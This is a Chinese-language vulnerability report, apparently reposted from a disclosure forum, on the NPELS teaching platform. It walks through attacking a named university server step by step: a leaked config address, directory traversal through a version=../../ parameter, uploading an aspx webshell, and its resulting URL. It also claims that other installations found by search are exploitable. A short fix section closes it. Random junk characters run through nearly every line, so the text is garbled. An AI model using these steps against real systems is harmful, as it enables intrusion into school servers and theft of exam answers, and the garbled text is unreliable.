好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中% N7 j6 r6 }6 N2 r6 e
& l: k: m8 V4 } A+ `
详细说明:3 N( H+ m8 ~8 I' f. \$ B/ y7 M: l
: v/ |9 k2 h8 n" z
以南开大学的为例: 2 W( Z( p' l, Y- r% K9 ~3 f
http://222.30.60.3/NPELS- T' C! Z8 j4 K! P
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
8 S+ o) i% m- }<setting name="Update_CommonSvr_CommonService" serializeAs="String">: S; |, b7 |) Y2 H
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>3 T, G# p) R1 g& j! U6 V
</setting>
! V9 i5 P+ V) m1 O- z及版本号* G% A9 ?% c6 x
<add key="TVersion" value="1, 0, 0, 2187"># x3 b, [, U( Q: e5 }. j" K
</add>
( O9 \5 Q1 l# M8 D直接访问
6 o" [" \% M# v$ i3 ^( B& Jhttp://222.30.60.3/NPELS/CommonService.asmx
4 U' k2 ]) F% F# K# n使用GetTestClientFileList操作,直接 HTTP GET 列目录:% i) w) n( D- \/ k; O
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187+ m0 D6 }' E8 P* f8 O# X
进一步列目录(返回的网页很大,可以直接 wget 下来); ^2 _# y- N2 z+ \3 P* M
http://222.30.60.3/NPELS/CommonS ... List?version=../../
- I3 j# @ z# P! U5 J- O
7 s. u; K9 |) c n# C发现: ^ ]6 t& D3 E
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
* s' @- Z: D, X8 N可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头' w, i7 p7 ]* d" J$ T( I Z6 `
上传后继续列目录找到木马地址直接访问即可
5 L" J. D2 u# ~% g : m$ @( L- [6 q$ v' ]
OOXX
) K. ~* F! j& W6 ^/ o) Y5 d+ ?. k
5 ~: D' f1 `4 z/ K8 b9 R# ]Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
+ U% M# R, c6 A1 I9 s$ }( J3 f漏洞证明:
7 } l2 G1 l/ l& a8 f $ ~2 P$ ^( w( N& o( k6 c1 j
列目录:8 \) a" y5 x a
http://222.30.60.3/NPELS/CommonS ... List?version=../../% }6 ?3 K4 r$ B% Q
文件上传:
9 `/ I/ w8 {; ?http://222.30.60.3/npelsv/editor/editor.htm: ~# W9 D. f( d7 R) X( b) p
8 X9 i* }6 T5 l* n6 _1 A
上传木马:
, _4 K8 J+ k/ q3 D8 V Ahttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx; g* ^3 A& H2 c3 F% N4 a
* S6 O6 N3 e5 K: D9 W4 @修复方案:
' O/ S2 z6 a( `% i0 A9 }好像考试系统必须使用 CommonService.asmx
! R- P" \; r, ~7 E8 I: z# _最好配置文件加密或者用别的方式不让它泄露出来
' Q# y- ?, T8 }* I* u并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样% M# |' y) Q" X% x4 f- S, J
|